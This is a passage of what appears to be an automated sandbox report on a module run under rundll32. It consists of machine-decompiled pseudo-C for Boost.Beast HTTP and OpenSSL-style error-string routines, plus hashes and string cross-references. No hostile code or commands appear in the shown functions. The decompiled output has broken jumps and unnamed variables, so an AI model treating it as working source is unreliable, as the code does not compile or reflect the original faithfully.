                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				_v144 = 0xfffffffe;
                                        				_t38 =  *(_t61 + 0x10) & 0x000000ff;
                                        				if (_t38 != 7) goto 0xf30134f9;
                                        				 *((long long*)(_t61 + 8)) =  *((long long*)(_t61 + 8)) + 0x10;
                                        				if ( *((intOrPtr*)(_t61 + 8)) !=  *_t61 + 0x18) goto 0xf301357c;
                                        				if ( *(_t61 + 0x10) == 0) goto 0xf30134e5;
                                        				 *(_t61 + 0x10) = 0;
                                        				 *((long long*)(_t61 + 8)) = 0xf3204a34;
                                        				 *(_t61 + 0x10) = 8;
                                        				goto 0xf301357c;
                                        				if (_t38 != 8) goto 0xf301351f;
                                        				 *((long long*)(_t61 + 8)) =  *((long long*)(_t61 + 8)) + 2;
                                        				if ( *((intOrPtr*)(_t61 + 8)) != 0xf3204a36) goto 0xf301357c;
                                        				if ( *(_t61 + 0x10) == 0) goto 0xf3013519;
                                        				 *(_t61 + 0x10) = 0;
                                        				 *(_t61 + 0x10) = 9;
                                        				goto 0xf301357c;
                                        				_v120 = 0xf319d200;
                                        				_v112 = 0xf319d200;
                                        				_v104 = 0xf319d200;
                                        				_v136 = "invalid iterator";
                                        				_v128 = 1;
                                        				E0000021E21EF310E0E4(_t59,  &_v136,  &_v112, _t68, _t69);
                                        				_v120 = 0xf319d240;
                                        				r9d = 0xd9;
                                        				return E0000021E21EF3010190(0xf319d240, _t59,  &_v120, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,8> &)", _t68);
                                        			}



















                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF3013464, 0000021EF3013537
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea, xrefs: 0000021EF3013494
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer, xrefs: 0000021EF301356A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __std_exception_copy$ExceptionThrow
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea$invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer
                                        • API String ID: 391329204-340118305
                                        • Opcode ID: 0ee7e3e791956c9b1287d491923b93dcd3cfdd896e556b7933079a29b0110e98
                                        • Instruction ID: 45a84a6f2e8564855e83fdf9d74bcc5056686965b699e4c4cd5229fae54d7805
                                        • Opcode Fuzzy Hash: 0ee7e3e791956c9b1287d491923b93dcd3cfdd896e556b7933079a29b0110e98
                                        • Instruction Fuzzy Hash: 52319E32205B8485EF51DB18E8883CA37E1F364718FA24226EEAD47BA5EB7DC557C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E0000021E21EF3013290() {
                                        				char _v32;
                                        				char _v40;
                                        				long long _v72;
                                        				long long _v104;
                                        				char _v112;
                                        				char _v120;
                                        				char _v128;
                                        				char _v136;
                                        				long long _v144;
                                        				signed int _t36;
                                        				long long _t46;
                                        				void* _t50;
                                        				char* _t52;
                                        				long long _t57;
                                        				void* _t60;
                                        				void* _t61;
                                        				void* _t62;
                                        				void* _t64;
                                        
                                        				_t64 = _t62;
                                        				 *((long long*)(_t64 - 0x38)) = 0xfffffffe;
                                        				 *((long long*)(_t64 - 0x20)) = 0xf319d200;
                                        				 *((long long*)(_t64 - 0x18)) = 0xf319d200;
                                        				 *((long long*)(_t64 - 0x10)) = 0xf319d200;
                                        				 *((long long*)(_t64 - 0x30)) = "invalid iterator";
                                        				_v40 = 1;
                                        				E0000021E21EF310E0E4(_t50, _t64 - 0x30, _t64 - 0x18, _t60, _t61);
                                        				_v32 = 0xf319d240;
                                        				r9d = 0xc2;
                                        				_t57 = "class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,5> &) const";
                                        				_t52 =  &_v32;
                                        				E0000021E21EF3010190(0xf319d240, _t50, _t52, _t57, _t60);
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				_v72 = _t57;
                                        				_v144 = 0xfffffffe;
                                        				if ( *((char*)(_t52 + 0x20)) != 6) goto 0xf3013356;
                                        				_t46 = _t52 + 8;
                                        				 *_t46 =  *_t46 + 2;
                                        				if ( *_t46 != 0xf3204a36) goto 0xf30133b3;
                                        				_t36 =  *(_t46 + 0x18) & 0x000000ff;
                                        				if (_t36 == 0) goto 0xf3013350;
                                        				if (_t36 != 1) goto 0xf301334c;
                                        				_v72 = _t46;
                                        				if ( *((char*)(_t46 + 0x10)) == 0) goto 0xf301334c;
                                        				 *((char*)(_t46 + 0x10)) = 0;
                                        				 *(_t46 + 0x18) = 0;
                                        				 *(_t46 + 0x18) = 7;
                                        				goto 0xf30133b3;
                                        				_v120 = 0xf319d200;
                                        				_v112 = 0xf319d200;
                                        				_v104 = 0xf319d200;
                                        				_v136 = "invalid iterator";
                                        				_v128 = 1;
                                        				E0000021E21EF310E0E4(_t50,  &_v136,  &_v112, _t60, _t61);
                                        				_v120 = 0xf319d240;
                                        				r9d = 0xd9;
                                        				return E0000021E21EF3010190(0xf319d240, _t50,  &_v120, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,6> &)", _t60);
                                        			}






















                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF30132B4, 0000021EF301336E
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,stru, xrefs: 0000021EF30132E4
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas, xrefs: 0000021EF30133A1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __std_exception_copy$ExceptionThrow
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,stru$invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas
                                        • API String ID: 391329204-3342265597
                                        • Opcode ID: 049dc1479e7db87711f72acbadcf86a6227ac42701e28c3f6069374f22c40323
                                        • Instruction ID: 95e3bfd69bbbbf35b6df5147cb01ea301a1e1b5bc19a5fde7021c5061dcdd11a
                                        • Opcode Fuzzy Hash: 049dc1479e7db87711f72acbadcf86a6227ac42701e28c3f6069374f22c40323
                                        • Instruction Fuzzy Hash: 4931AF32219F4095EF50DB14E88838A37F1F3A4364F960226EEAD43BA5EB7CC556C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E0000021E21EF30137E0() {
                                        				char _v32;
                                        				char _v40;
                                        				long long _v72;
                                        				long long _v104;
                                        				char _v112;
                                        				char _v120;
                                        				char _v128;
                                        				char _v136;
                                        				long long _v144;
                                        				signed int _t36;
                                        				long long _t46;
                                        				void* _t50;
                                        				char* _t52;
                                        				long long _t57;
                                        				void* _t60;
                                        				void* _t61;
                                        				void* _t62;
                                        				void* _t64;
                                        
                                        				_t64 = _t62;
                                        				 *((long long*)(_t64 - 0x38)) = 0xfffffffe;
                                        				 *((long long*)(_t64 - 0x20)) = 0xf319d200;
                                        				 *((long long*)(_t64 - 0x18)) = 0xf319d200;
                                        				 *((long long*)(_t64 - 0x10)) = 0xf319d200;
                                        				 *((long long*)(_t64 - 0x30)) = "invalid iterator";
                                        				_v40 = 1;
                                        				E0000021E21EF310E0E4(_t50, _t64 - 0x30, _t64 - 0x18, _t60, _t61);
                                        				_v32 = 0xf319d240;
                                        				r9d = 0xc2;
                                        				_t57 = "class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,8> &) const";
                                        				_t52 =  &_v32;
                                        				E0000021E21EF3010190(0xf319d240, _t50, _t52, _t57, _t60);
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				_v72 = _t57;
                                        				_v144 = 0xfffffffe;
                                        				if ( *((char*)(_t52 + 0x20)) != 9) goto 0xf30138a6;
                                        				_t46 = _t52 + 8;
                                        				 *_t46 =  *_t46 + 2;
                                        				if ( *_t46 != 0xf3204a36) goto 0xf3013903;
                                        				_t36 =  *(_t46 + 0x18) & 0x000000ff;
                                        				if (_t36 == 0) goto 0xf30138a0;
                                        				if (_t36 != 1) goto 0xf301389c;
                                        				_v72 = _t46;
                                        				if ( *((char*)(_t46 + 0x10)) == 0) goto 0xf301389c;
                                        				 *((char*)(_t46 + 0x10)) = 0;
                                        				 *(_t46 + 0x18) = 0;
                                        				 *(_t46 + 0x18) = 0xa;
                                        				goto 0xf3013903;
                                        				_v120 = 0xf319d200;
                                        				_v112 = 0xf319d200;
                                        				_v104 = 0xf319d200;
                                        				_v136 = "invalid iterator";
                                        				_v128 = 1;
                                        				E0000021E21EF310E0E4(_t50,  &_v136,  &_v112, _t60, _t61);
                                        				_v120 = 0xf319d240;
                                        				r9d = 0xd9;
                                        				return E0000021E21EF3010190(0xf319d240, _t50,  &_v120, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,9> &)", _t60);
                                        			}






















                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF3013804, 0000021EF30138BE
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,clas, xrefs: 0000021EF3013834
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas, xrefs: 0000021EF30138F1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __std_exception_copy$ExceptionThrow
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,clas$invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas
                                        • API String ID: 391329204-654534564
                                        • Opcode ID: 06b47b149ba674be803b27fcd790675cea3982de6692d6c533135f3f13808246
                                        • Instruction ID: daa48b3371a6d360e79a83f978e531648407899098ec7335f9cdd3aa81c3f305
                                        • Opcode Fuzzy Hash: 06b47b149ba674be803b27fcd790675cea3982de6692d6c533135f3f13808246
                                        • Instruction Fuzzy Hash: C1317032215F8095EF50DB14E88838A3BF5F3A5354F920226EEAD47BA5EB7CC556C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 36%
                                        			E0000021E21EF2FF9E70(void* __rcx) {
                                        				char _v80;
                                        				char _v144;
                                        				char _v232;
                                        				long long _v240;
                                        				long long _v248;
                                        				char _v256;
                                        				char _v264;
                                        				char _v272;
                                        				char _v280;
                                        				void* __rbx;
                                        				void* _t37;
                                        				void* _t38;
                                        				intOrPtr _t39;
                                        				void* _t42;
                                        				long long _t49;
                                        				void* _t54;
                                        				char* _t62;
                                        				void* _t74;
                                        				void* _t75;
                                        
                                        				_v240 = 0xfffffffe;
                                        				_t54 = __rcx;
                                        				_t49 =  *((intOrPtr*)(__rcx + 0x70));
                                        				_v280 = 1;
                                        				_v272 = _t49;
                                        				_t39 =  *((intOrPtr*)(__rcx + 0x5c));
                                        				if (_t39 != 8) goto 0xf2ff9f59;
                                        				if (_t49 == 0) goto 0xf2ff9f5e;
                                        				_v264 = 0xf319d200;
                                        				_v256 = 0xf319d200;
                                        				_v248 = 0xf319d200;
                                        				_v280 = "invalid request body";
                                        				_v272 = 1;
                                        				E0000021E21EF310E0E4(__rcx,  &_v280,  &_v256, _t74, _t75);
                                        				_v264 = 0xf319d240;
                                        				_v264 = 0xf319d258;
                                        				E0000021E21EF30013E0(__rcx,  &_v144,  &_v264);
                                        				 *0x21EF319D280 = "void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_constant<bool,1>)";
                                        				 *0x21EF319D288 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/message.ipp";
                                        				 *0x21EF319D290 = 0x172;
                                        				E0000021E21EF3003440(0xf319d258,  &_v80);
                                        				E0000021E21EF3003480(_t38, __rcx,  &_v232, 0xf319d258, _t75);
                                        				_t62 =  &_v232;
                                        				E0000021E21EF31103EC(__rcx, _t62, 0xf31e4690, _t75);
                                        				if (0xf319d258 != 0) goto 0xf2ff9f8b;
                                        				if ((_t62 - 0x00000004 & 0xfffffffc) != 0) goto 0xf2ff9f6d;
                                        				if (_t39 != 6) goto 0xf2ff9f8b;
                                        				0xf3000b00();
                                        				_v280 = 0;
                                        				E0000021E21EF3001170(_t38, _t42, 0xf319d258, _t54, _t54,  &_v280, _t75);
                                        				goto 0xf2ff9fa2;
                                        				_t37 = E0000021E21EF3001170(_t38, _t42, 0xf319d258, _t54, _t54,  &_v280, _t75);
                                        				0xf3000b00();
                                        				return _t37;
                                        			}

                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp, xrefs: 0000021EF2FF9F17
                                        • void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_, xrefs: 0000021EF2FF9F0C
                                        • invalid request body, xrefs: 0000021EF2FF9EC0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp$invalid request body$void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_
                                        • API String ID: 3608347590-2849356305
                                        • Opcode ID: 15a5388d6bc62080ccf0706142a58d9206a5d28c7ffa795efbdde216f47d1515
                                        • Instruction ID: bdd62983b66ba000e72901121e71755a1066b0601e23b7edf12ecb5dbc54fc9e
                                        • Opcode Fuzzy Hash: 15a5388d6bc62080ccf0706142a58d9206a5d28c7ffa795efbdde216f47d1515
                                        • Instruction Fuzzy Hash: 3E316B72225B4091EE60DB14EC843DAB3A5F7E9354F421226EE9E42BE9EF3CC146C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FF9550() {
                                        				long long _v240;
                                        				void* _t6;
                                        
                                        				_v240 = 0xfffffffe;
                                        				if (_t6 - 0x21 > 0) goto 0xf2ff97e8;
                                        				goto __rdx;
                                        			}

                                        APIs
                                        Strings
                                        • unknown verb, xrefs: 0000021EF2FF9800
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/verb.ipp, xrefs: 0000021EF2FF9857
                                        • class boost::basic_string_view<char,struct std::char_traits<char> > __cdecl boost::beast::http::detail::verb_to_string<void>(enum boost::beast::http::verb), xrefs: 0000021EF2FF984C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/verb.ipp$class boost::basic_string_view<char,struct std::char_traits<char> > __cdecl boost::beast::http::detail::verb_to_string<void>(enum boost::beast::http::verb)$unknown verb
                                        • API String ID: 1552479455-1288829158
                                        • Opcode ID: 57095a948f91b45fc15dc5d14dab256eb02e633188c9eac2244ef9de57736c09
                                        • Instruction ID: 704d90b367a0ef97889a884556288308acdb8682d2771db00a4cbf1810cbca78
                                        • Opcode Fuzzy Hash: 57095a948f91b45fc15dc5d14dab256eb02e633188c9eac2244ef9de57736c09
                                        • Instruction Fuzzy Hash: 3F216D72205B4092DE519B00E8843CBB3B5F799354F814226EE9D43BA9EF7CC65AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 49%
                                        			E0000021E21EF3007010(void* __ebx, intOrPtr __edx, void* __rbx, void* __rsi) {
                                        				char _v80;
                                        				char _v144;
                                        				char _v232;
                                        				long long _v240;
                                        				char _v248;
                                        				char _v256;
                                        				long long _v264;
                                        				char _v272;
                                        				char _v280;
                                        				void* _t25;
                                        				void* _t26;
                                        				intOrPtr _t27;
                                        				char* _t41;
                                        				void* _t47;
                                        
                                        				_t48 = __rsi;
                                        				_t34 = __rbx;
                                        				_t27 = __edx;
                                        				_t26 = __ebx;
                                        				_v240 = 0xfffffffe;
                                        				if (__edx - 0x3e7 <= 0) goto 0xf30070dd;
                                        				_v280 = 0xf319d200;
                                        				_v272 = 0xf319d200;
                                        				_v264 = 0xf319d200;
                                        				_v256 = "invalid status-code";
                                        				_v248 = 1;
                                        				E0000021E21EF310E0E4(__rbx,  &_v256,  &_v272, _t47, __rsi);
                                        				_v280 = 0xf319d240;
                                        				_v280 = 0xf319d258;
                                        				E0000021E21EF30013E0(_t34,  &_v144,  &_v280);
                                        				 *0x21EF319D280 = "void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int)";
                                        				 *0x21EF319D288 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/message.ipp";
                                        				 *0x21EF319D290 = 0x92;
                                        				E0000021E21EF3003440(0xf319d258,  &_v80);
                                        				E0000021E21EF3003480(_t26, _t34,  &_v232, 0xf319d258, _t48);
                                        				_t41 =  &_v232;
                                        				_t25 = E0000021E21EF31103EC(_t34, _t41, 0xf31e4690, _t48);
                                        				 *((intOrPtr*)(_t41 + 0x5c)) = _t27;
                                        				return _t25;
                                        			}

                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp, xrefs: 0000021EF300709B
                                        • void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int), xrefs: 0000021EF3007090
                                        • invalid status-code, xrefs: 0000021EF3007044
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp$invalid status-code$void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int)
                                        • API String ID: 3608347590-395387356
                                        • Opcode ID: 50cda2e0f1280f95b61c1fdc4194b777afc7643b2209b709a0bfa74a048f2156
                                        • Instruction ID: c2667ac5e0cbeb7397a10f4414df4671da6bc59bbb7eb031027ef76faa799877
                                        • Opcode Fuzzy Hash: 50cda2e0f1280f95b61c1fdc4194b777afc7643b2209b709a0bfa74a048f2156
                                        • Instruction Fuzzy Hash: 4F110B72215B4095DA619B10E8843CF73B5F7E4354F815326AE9D43BA5EF7CC65AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 24%
                                        			E0000021E21EF3021840(unsigned int __ecx, void* __rax, intOrPtr* __rdx, void* __r8, long long __r12, long long __r13, long long __r14, long long __r15) {
                                        				void* __rbx;
                                        				char* _t39;
                                        				void* _t67;
                                        				signed long long _t70;
                                        				signed long long _t71;
                                        				void* _t74;
                                        				void* _t76;
                                        				void* _t77;
                                        				intOrPtr* _t88;
                                        				void* _t96;
                                        				void* _t99;
                                        				intOrPtr* _t100;
                                        				long long _t103;
                                        				void* _t106;
                                        				signed long long _t107;
                                        				void* _t114;
                                        				signed long long _t118;
                                        				signed long long _t121;
                                        				void* _t123;
                                        				signed long long _t126;
                                        
                                        				_t92 = __rdx;
                                        				if (__r8 == 0) goto 0xf3021a38;
                                        				E0000021E21EF310C220();
                                        				_t107 = _t106 - __rax;
                                        				_t70 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_t71 = _t70 ^ _t107;
                                        				 *(_t107 + 0x100) = _t71;
                                        				 *((long long*)(_t107 + 0x168)) = _t103;
                                        				_t77 = __r8;
                                        				 *((long long*)(_t107 + 0x128)) = __r12;
                                        				 *((long long*)(_t107 + 0x120)) = __r13;
                                        				r12d = __ecx;
                                        				_t100 = __rdx;
                                        				 *((long long*)(_t107 + 0x118)) = __r14;
                                        				 *((long long*)(_t107 + 0x110)) = __r15;
                                        				r12d = r12d & 0x00000fff;
                                        				E0000021E21EF3021E10(__ecx, _t71, __r8, _t96);
                                        				_t118 = _t71;
                                        				E0000021E21EF3021A40(__ecx, _t71, __r8, _t99);
                                        				_t126 = _t71;
                                        				E0000021E21EF30223F0(__ecx, _t71, __r8, _t76);
                                        				_t121 = _t71;
                                        				if (_t118 != 0) goto 0xf30218f0;
                                        				r9d = __ecx;
                                        				r9d = r9d >> 0x18;
                                        				E0000021E21EF3026420(_t71, _t107 + 0xc0, _t92, "lib(%lu)", _t114);
                                        				if (_t126 != 0) goto 0xf3021910;
                                        				r9d = __ecx >> 0x0000000c & 0x00000fff;
                                        				E0000021E21EF3026420(_t71, _t107 + 0x80, _t92, "func(%lu)", _t114);
                                        				if (_t121 != 0) goto 0xf302192d;
                                        				r9d = r12d;
                                        				E0000021E21EF3026420(_t71, _t107 + 0x40, _t92, "reason(%lu)", _t114);
                                        				r9d = __ecx;
                                        				_t94 =  !=  ? _t121 : _t107 + 0x40;
                                        				 *((long long*)(_t107 + 0x30)) =  !=  ? _t121 : _t107 + 0x40;
                                        				_t85 =  !=  ? _t126 : _t107 + 0x80;
                                        				 *((long long*)(_t107 + 0x28)) =  !=  ? _t126 : _t107 + 0x80;
                                        				_t73 =  !=  ? _t118 : _t107 + 0xc0;
                                        				 *((long long*)(_t107 + 0x20)) =  !=  ? _t118 : _t107 + 0xc0;
                                        				E0000021E21EF3026420( !=  ? _t118 : _t107 + 0xc0, _t100, _t77, "error:%08lX:%s:%s:%s", _t114);
                                        				if ( *_t100 == 0) goto 0xf30219b1;
                                        				if (0 - 0x80000000 >= 0) goto 0xf30219b1;
                                        				_t88 = _t100 + 1;
                                        				if ( *_t88 != dil) goto 0xf30219a0;
                                        				_t74 = _t77 - 1;
                                        				asm("btr ecx, 0x1f");
                                        				if (_t88 != _t74) goto 0xf3021a0e;
                                        				if (_t77 - 4 <= 0) goto 0xf3021a0e;
                                        				_t123 = _t77 - 5 + _t100;
                                        				asm("o16 nop [eax+eax]");
                                        				_t39 = strchr(??, ??);
                                        				if (_t74 == 0) goto 0xf30219f7;
                                        				_t67 = _t74 - _t123;
                                        				if (_t67 <= 0) goto 0xf30219fe;
                                        				 *((char*)(_t123 + _t96)) = 0x3a;
                                        				if (_t67 != 0) goto 0xf30219e0;
                                        				E0000021E21EF310C290();
                                        				return _t39;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: strchr
                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                        • API String ID: 2830005266-2416195885
                                        • Opcode ID: 373d0aa5d4f50cb0df9997d0a00ce80c1150626dcc1f719d6cc4b1729f3f4d55
                                        • Instruction ID: 69dcc974325fa366352419328c2d5d1a231acc0da06b56beb2fc55f7b9496cf0
                                        • Opcode Fuzzy Hash: 373d0aa5d4f50cb0df9997d0a00ce80c1150626dcc1f719d6cc4b1729f3f4d55
                                        • Instruction Fuzzy Hash: 48418F32305AC551EE399B05BC087EBA7A4F7A8B84F4640229E8A87F85DE7CC547C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: 1931b78b82c2b0e54143dbc2a54af92af03a8e0969eaf2cdd513bb1de8eef630
                                        • Instruction ID: 29c06c9edfa03bd362e61705e0405a170bb4ebb2f0f8004de7af68113aa36cab
                                        • Opcode Fuzzy Hash: 1931b78b82c2b0e54143dbc2a54af92af03a8e0969eaf2cdd513bb1de8eef630
